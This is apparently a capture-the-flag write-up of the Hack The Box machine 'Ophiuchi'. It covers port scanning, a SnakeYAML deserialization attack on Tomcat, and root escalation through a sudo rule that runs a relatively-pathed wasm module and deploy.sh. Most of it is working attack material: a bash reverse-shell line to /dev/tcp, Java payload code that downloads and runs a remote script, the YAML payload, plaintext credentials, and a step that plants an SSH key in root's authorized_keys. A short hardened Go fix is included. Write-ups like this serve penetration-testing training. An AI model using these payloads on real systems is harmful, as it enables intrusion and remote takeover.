Ophiuchi

$ sudo nmap -p- -T4 -A 10.10.10.227
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6d:fc:68:e2:da:5e:80:df:bc:d0:45:f5:29:db:04:ee (RSA)
| 256 7a:c9:83:7e:13:cb:c3:f9:59:1e:53:21:ab:19:76:ab (ECDSA)
|_ 256 17:6b:c3:a8:fc:5d:36:08:a1:40:89:d2:f4:0a:c6:46 (ED25519)
8080/tcp open http Apache Tomcat 9.0.38
|_http-title: Parse YAML

$ dirb 10.10.10.227:8080

$ nikto -h 10.10.10.227:8080
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 8169 requests: 0 error(s) and 9 item(s) reported on remote host

$ echo "10.10.10.227 ophiuchi.htb" | sudo tee -a /etc/hosts
https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858
https://github.com/mbechler/marshalsec
https://github.com/artsploit/yaml-payload

SnakeYAML deserialization exploit

git clone https://github.com/artsploit/yaml-payload
revshell.sh
#!/bin/sh
bash -i >& /dev/tcp/10.10.14.149/8888 0>&1
Edit the AwesomeScriptEngineFactory.java file so that it executes the desired commands:
package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("curl http://10.10.14.149/mash.sh -o /tmp/mash.sh");
            Runtime.getRuntime().exec("bash /tmp/mash.sh");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
... ...
Create the Java payload JAR:
$cd yaml-payload
$javac src/artsploit/AwesomeScriptEngineFactory.java
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
$jar -cvf yaml-payload.jar -C src/ .
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
added manifest
ignoring entry META-INF/
adding: META-INF/services/(in = 0) (out= 0)(stored 0%)
adding: META-INF/services/javax.script.ScriptEngineFactory(in = 36) (out= 38)(deflated -5%)
adding: artsploit/(in = 0) (out= 0)(stored 0%)
adding: artsploit/AwesomeScriptEngineFactory.class(in = 1671) (out= 701)(deflated 58%)
adding: artsploit/AwesomeScriptEngineFactory.java(in = 1568) (out= 413)(deflated 73%)

Start a Python web server on port 80 and a listener on port 8888:
$python3 -m http.server 80
$nc -lvnp 8888
Submit the following YAML to the parser at http://ophiuchi.htb:8080/ to get RCE:
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.14.149/yaml-payload.jar"]
  ]]
]
Due to security reason this feature has been temporarily on hold. We will soon fix the issue!
$ nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.14.149] from (UNKNOWN) [10.10.10.227] 46010
bash: cannot set terminal process group (815): Inappropriate ioctl for device
bash: no job control in this shell
tomcat@ophiuchi:/$ 
tomcat@ophiuchi:/home/admin$ ls -la
-r-------- 1 admin admin   33 Apr 29 13:30 user.txt
tomcat@ophiuchi:~/conf$ less tomcat-users.xml
<user username="admin" password="whythereisalimit" roles="manager-gui,admin-gui"/>
$ ssh admin@10.10.10.227
admin@ophiuchi:~$ cat user.txt
6b75f38db920b0d58606464a53d9d3aa
admin@ophiuchi:~$ sudo -l
Matching Defaults entries for admin on ophiuchi:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on ophiuchi:
    (ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go

admin@ophiuchi:/opt/wasm-functions$ cat index.go
package main

import (
        "fmt"
        wasm "github.com/wasmerio/wasmer-go/wasmer"
        "os/exec"
        "log"
)


func main() {
        bytes, _ := wasm.ReadBytes("main.wasm")

        instance, _ := wasm.NewInstance(bytes)
        defer instance.Close()
        init := instance.Exports["info"]
        result,_ := init()
        f := result.String()
        if (f != "1") {
                fmt.Println("Not ready to deploy")
        } else {
                fmt.Println("Ready to deploy")
                out, err := exec.Command("/bin/sh", "deploy.sh").Output()
                if err != nil {
                        log.Fatal(err)
                }
                fmt.Println(string(out))
        }
}
admin@ophiuchi:/tmp$ mkdir fuzi
admin@ophiuchi:/tmp$ cd fuzi
admin@ophiuchi:/tmp/fuzi$ cp /opt/wasm-functions/main.wasm ./
admin@ophiuchi:/tmp/fuzi$ vi deploy.sh
admin@ophiuchi:/tmp/fuzi$ cat deploy.sh 
#!/bin/sh
echo $(id)
Not ready to deploy
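The run above shows the root cause: index.go opens "main.wasm" and "deploy.sh" by bare name, so they resolve against whatever directory the sudo caller is standing in. As an added example (not the box's code), the hardened variant below pins both artifacts under /opt/wasm-functions and refuses anything a non-root user could have written or swapped in; the helper names trustedPath and checkNotWritable are my own.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
)

// Fixed home of the trusted artifacts. index.go opens the bare names "main.wasm"
// and "deploy.sh", which resolve against the caller's working directory, so
// whoever holds the sudo rule picks the module and script that root runs.
const deployDir = "/opt/wasm-functions"

// trustedPath anchors name under baseDir and rejects anything resolving outside it.
func trustedPath(baseDir, name string) (string, error) {
	p := filepath.Join(baseDir, name)
	if filepath.Dir(p) != filepath.Clean(baseDir) {
		return "", fmt.Errorf("%q resolves outside %s", name, baseDir)
	}
	return p, nil
}

// checkNotWritable rejects non-regular files (Lstat, so a planted symlink is not
// followed) and files that group or others could modify before root executes them.
func checkNotWritable(p string) error {
	info, err := os.Lstat(p)
	if err != nil {
		return err
	}
	if !info.Mode().IsRegular() {
		return fmt.Errorf("%s: not a regular file", p)
	}
	if perm := info.Mode().Perm(); perm&0o022 != 0 {
		return fmt.Errorf("%s: writable by group/others (%04o)", p, perm)
	}
	return nil
}
func main() {
	for _, name := range []string{"main.wasm", "deploy.sh"} {
		p, err := trustedPath(deployDir, name)
		if err == nil {
			err = checkNotWritable(p)
		}
		if err != nil {
			fmt.Println("Not ready to deploy:", err)
			os.Exit(1)
		}
		fmt.Println("trusted:", p)
	}
}
```

Even with these checks, a sudo rule on `go run` compiles source on every call; a root-owned prebuilt binary is the safer thing to grant.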
Wasm is short for WebAssembly. WebAssembly is an open standard that defines a portable binary-code format for executable programs, a corresponding textual assembly language, and interfaces for interactions between such programs and their host environment. The human-readable form of a WASM binary is WAT (WebAssembly Text).
Install the WABT toolsuite from https://github.com/webassembly/wabt.
It provides two binaries, wasm2wat and wat2wasm, which let us change the value that info returns (and therefore f) by editing the module in its text form and converting it back.
We transfer the main.wasm file from the target machine to our local machine using nc:
admin@ophiuchi:/tmp/fuzi$ cat main.wasm | nc 10.10.14.149 4444 
kali@kali:~/0.htb/machines/Ophiuchi227/wabt-1.0.23/bin$ nc -lvnp 4444 > main.wasm
listening on [any] 4444 ...
connect to [10.10.14.149] from (UNKNOWN) [10.10.10.227] 50846

kali@kali:~/0.htb/machines/Ophiuchi227/wabt-1.0.23/bin$ ./wasm2wat main.wasm >main.wat
kali@kali:~/0.htb/machines/Ophiuchi227/wabt-1.0.23/bin$ cat main.wat
(module
  (type (;0;) (func (result i32)))
  (func $info (type 0) (result i32)
    i32.const 0)
  (table (;0;) 1 1 funcref)
  (memory (;0;) 16)
  (global (;0;) (mut i32) (i32.const 1048576))
  (global (;1;) i32 (i32.const 1048576))
  (global (;2;) i32 (i32.const 1048576))
  (export "memory" (memory 0))
  (export "info" (func $info))
  (export "__data_end" (global 1))
  (export "__heap_base" (global 2)))
kali@kali:~/0.htb/machines/Ophiuchi227/wabt-1.0.23/bin$ vi main.wat
kali@kali:~/0.htb/machines/Ophiuchi227/wabt-1.0.23/bin$ cat main.wat
(module
  (type (;0;) (func (result i32)))
  (func $info (type 0) (result i32)
    i32.const 1)
  (table (;0;) 1 1 funcref)
  (memory (;0;) 16)
  (global (;0;) (mut i32) (i32.const 1048576))
  (global (;1;) i32 (i32.const 1048576))
  (global (;2;) i32 (i32.const 1048576))
  (export "memory" (memory 0))
  (export "info" (func $info))
  (export "__data_end" (global 1))
  (export "__heap_base" (global 2)))
kali@kali:~/0.htb/machines/Ophiuchi227/wabt-1.0.23/bin$ ./wat2wasm main.wat
kali@kali:~/0.htb/machines/Ophiuchi227/wabt-1.0.23/bin$ scp main.wasm admin@10.10.10.227:/tmp/fuzi
admin@10.10.10.227's password: 
main.wasm                                                                                                                                        100%  112     4.2KB/s   00:00    
kali@kali:~/0.htb/machines/Ophiuchi227/wabt-1.0.23/bin$ 
admin@ophiuchi:/tmp/fuzi$ sudo /usr/bin/go run /opt/wasm-functions/index.go
Ready to deploy
uid=0(root) gid=0(root) groups=0(root)
kali@kali:~/0.htb/machines/Ophiuchi227/wabt-1.0.23/bin$ cat ~/.ssh/id_rsa.pub 
ssh-rsa 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 kali@kali
admin@ophiuchi:/tmp/fuzi$ vi deploy.sh 
admin@ophiuchi:/tmp/fuzi$ cat deploy.sh 
#!/bin/sh
echo $(id)
echo "ssh-rsa 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 kali@kali" >> /root/.ssh/authorized_keys
admin@ophiuchi:/tmp/fuzi$
admin@ophiuchi:/tmp/fuzi$ sudo /usr/bin/go run /opt/wasm-functions/index.go
Ready to deploy
uid=0(root) gid=0(root) groups=0(root)

admin@ophiuchi:/tmp/fuzi$
kali@kali:~/0.htb/machines/Ophiuchi227$ ssh root@ophiuchi.htb
The authenticity of host 'ophiuchi.htb (10.10.10.227)' can't be established.
ECDSA key fingerprint is SHA256:OmZ+JsRqDVNaBWMshp7wogZM0KhSKkp1YmaILhRxSY0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'ophiuchi.htb' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-51-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 29 Apr 2021 04:31:02 PM UTC

  System load:             0.02
  Usage of /:              19.9% of 27.43GB
  Memory usage:            11%
  Swap usage:              0%
  Processes:               222
  Users logged in:         1
  IPv4 address for ens160: 10.10.10.227
  IPv6 address for ens160: dead:beef::250:56ff:feb9:e13b


176 updates can be installed immediately.
56 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Feb  5 17:51:32 2021
root@ophiuchi:~# whoami
root
root@ophiuchi:~# ls -la
total 44
drwx------  8 root root 4096 Jan  7 09:10 .
drwxr-xr-x 20 root root 4096 Feb  5 18:10 ..
lrwxrwxrwx  1 root root    9 Oct 14  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwxr-xr-x  3 root root 4096 Oct 19  2020 .cache
drwxr-xr-x  4 root root 4096 Oct 14  2020 .cargo
drwxr-xr-x  4 root root 4096 Oct 14  2020 go
drwxr-xr-x  3 root root 4096 Oct 12  2020 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-r--------  1 root root   33 Apr 29 13:30 root.txt
drwxr-xr-x  3 root root 4096 Oct 11  2020 snap
drwx------  2 root root 4096 Oct 11  2020 .ssh
lrwxrwxrwx  1 root root    9 Jan  7 09:10 .viminfo -> /dev/null
root@ophiuchi:~# cat root.txt
80aebbdd868c16c3bc710d7af750e414
root@ophiuchi:~# 
